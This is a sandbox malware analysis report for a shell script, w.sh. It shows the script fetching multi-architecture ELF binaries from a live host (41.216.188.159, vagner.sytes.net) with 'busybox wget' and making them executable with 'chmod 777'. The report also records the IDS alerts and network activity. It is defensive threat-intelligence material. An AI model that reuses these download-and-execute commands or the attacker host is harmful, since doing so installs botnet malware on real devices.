File name:

w.sh

Full analysis: https://app.any.run/tasks/ed4900b4-dc99-4b1c-8012-20763a335cb9
Verdict: Malicious activity
Analysis date: June 21, 2025, 21:34:22
OS: Ubuntu 22.04.2
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

D31100C4C6DE02B96FA00F2D47007426

SHA1:

1D9E905DD47B53E52DD4F4599E6C65EDFBB1A886

SHA256:

4A1A0DC3D4E1CFCF57C9515839AB8F5D690733BB196538311BCE58479E81B440

SSDEEP:

24:FJJbzBglJJbT1lJJbxNIIolJJbdKSflJJbjTllJJbTllJJbpl95lJJbf9mlJJbDC:VXBg1H115o1Rxf1HTl1nl1b95179m1XC

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • main_x86_64 (PID: 41436)
      • main_x86_64 (deleted) (PID: 41437)
      • main_x86_64 (deleted) (PID: 41439)

  • SUSPICIOUS

    • Potential Corporate Privacy Violation

      • busybox (PID: 41397)
      • busybox (PID: 41406)
      • busybox (PID: 41415)
      • busybox (PID: 41434)
      • busybox (PID: 41419)
      • busybox (PID: 41427)
      • busybox (PID: 41423)
      • busybox (PID: 41438)

    • Starts itself from another location

      • main_x86_64 (PID: 41436)

    • Executes commands using command-line interpreter

      • bash (PID: 41392)
      • sudo (PID: 41391)

    • Modifies file or directory owner

      • sudo (PID: 41388)

    • Connects to unusual port

      • main_x86_64 (deleted) (PID: 41437)

  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
180
Monitored processes
46
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
dash no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs busybox chmod no specs bash no specs busybox chmod no specs bash no specs busybox chmod no specs bash no specs busybox tracker-extract-3 no specs chmod no specs bash no specs busybox chmod no specs bash no specs busybox chmod no specs bash no specs busybox chmod no specs bash no specs busybox chmod no specs bash no specs busybox chmod no specs bash no specs busybox chmod no specs main_x86_64 no specs busybox main_x86_64 (deleted) main_x86_64 (deleted) no specs chmod no specs bash no specs busybox chmod no specs bash no specs

Process information

PID
CMD
Path
Indicators
Parent process
41387/bin/sh -c "sudo chown user /tmp/w\.sh && chmod +x /tmp/w\.sh && DISPLAY=:0 sudo -iu user /tmp/w\.sh "/usr/bin/dashUbvyYXL4x2mYa65Q
User:
root
Integrity Level:
UNKNOWN
Exit code:
32512
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41388sudo chown user /tmp/w.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
41389chown user /tmp/w.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41390chmod +x /tmp/w.sh/usr/bin/chmoddash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41391sudo -iu user /tmp/w.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
32512
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
41392-bash --login -c \/tmp\/w\.sh/usr/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
32512
Modules
Images
/usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
/usr/lib/x86_64-linux-gnu/libc.so.6
41393/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41394busybox wget http://41.216.188.159/main_arm/usr/bin/busybox
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
256
41395chmod 777 main_arm/usr/bin/chmodbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
256
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41396-bash --login -c \/tmp\/w\.sh/usr/bin/bashbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
32512
Executable files
0
Suspicious files
8
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
41397busybox/home/user/main_arm5o
MD5:
SHA256:
41406busybox/home/user/main_arm7o
MD5:
SHA256:
41415busybox/home/user/main_sh4binary
MD5:
SHA256:
41419busybox/home/user/main_ppcbinary
MD5:
SHA256:
41423busybox/home/user/main_mipsbinary
MD5:
SHA256:
41427busybox/home/user/main_mpslbinary
MD5:
SHA256:
41434busybox/home/user/main_x86_64 (deleted)binary
MD5:
SHA256:
41438busybox/home/user/main_m68kbinary
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
11
TCP/UDP connections
138
DNS requests
125
Threats
123

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
204
91.189.91.98:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
41397
busybox
GET
200
41.216.188.159:80
http://41.216.188.159/main_arm5
unknown
unknown
41406
busybox
GET
200
41.216.188.159:80
http://41.216.188.159/main_arm7
unknown
unknown
41415
busybox
GET
200
41.216.188.159:80
http://41.216.188.159/main_sh4
unknown
unknown
41419
busybox
GET
200
41.216.188.159:80
http://41.216.188.159/main_ppc
unknown
unknown
41423
busybox
GET
200
41.216.188.159:80
http://41.216.188.159/main_mips
unknown
unknown
41443
busybox
GET
404
41.216.188.159:80
http://41.216.188.159/main_i586
unknown
unknown
41431
busybox
GET
404
41.216.188.159:80
http://41.216.188.159/main_sparc
unknown
unknown
41434
busybox
GET
200
41.216.188.159:80
http://41.216.188.159/main_x86_64
unknown
unknown
41438
busybox
GET
200
41.216.188.159:80
http://41.216.188.159/main_m68k
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
91.189.91.49:80
connectivity-check.ubuntu.com
Canonical Group Limited
US
whitelisted
185.125.190.98:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
484
avahi-daemon
224.0.0.251:5353
unknown
91.189.91.98:80
connectivity-check.ubuntu.com
Canonical Group Limited
US
whitelisted
212.102.56.179:443
odrs.gnome.org
Datacamp Limited
DE
whitelisted
512
snapd
185.125.188.59:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
512
snapd
185.125.188.57:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
512
snapd
185.125.188.54:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
512
snapd
185.125.188.58:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
41394
busybox
41.216.188.159:80
vagner.sytes.net
Private-Hosting di Cipriano oscar
DE
suspicious

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
  • 2620:2d:4000:1::96
  • 2620:2d:4000:1::97
  • 2620:2d:4000:1::23
  • 2620:2d:4000:1::2a
  • 2620:2d:4000:1::22
  • 2620:2d:4002:1::198
  • 2001:67c:1562::23
  • 2001:67c:1562::24
  • 2620:2d:4000:1::98
  • 2620:2d:4000:1::2b
  • 2620:2d:4002:1::197
  • 2620:2d:4002:1::196
  • 91.189.91.98
  • 185.125.190.98
  • 185.125.190.48
  • 185.125.190.17
  • 185.125.190.49
  • 91.189.91.49
  • 185.125.190.18
  • 91.189.91.48
  • 185.125.190.97
  • 91.189.91.96
  • 91.189.91.97
  • 185.125.190.96
whitelisted
google.com
  • 142.250.184.206
  • 2a00:1450:4001:81d::200e
whitelisted
odrs.gnome.org
  • 212.102.56.179
  • 169.150.255.184
  • 195.181.175.41
  • 195.181.170.19
  • 169.150.255.181
  • 207.211.211.27
  • 37.19.194.81
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::11
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::18
whitelisted
api.snapcraft.io
  • 185.125.188.59
  • 185.125.188.58
  • 185.125.188.57
  • 185.125.188.54
  • 2620:2d:4000:1010::2e6
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::117
  • 2620:2d:4000:1010::344
whitelisted
vagner.sytes.net
  • 41.216.188.159
unknown
13.100.168.192.in-addr.arpa
unknown

Threats

PID
Process
Class
Message
41397
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41406
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41415
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41419
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41423
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41427
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41437
main_x86_64 (deleted)
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.sytes.net Domain
41434
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41438
busybox
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41437
main_x86_64 (deleted)
Potentially Bad Traffic
ET DYN_DNS DYNAMIC_DNS Query to a *.sytes.net Domain
No debug info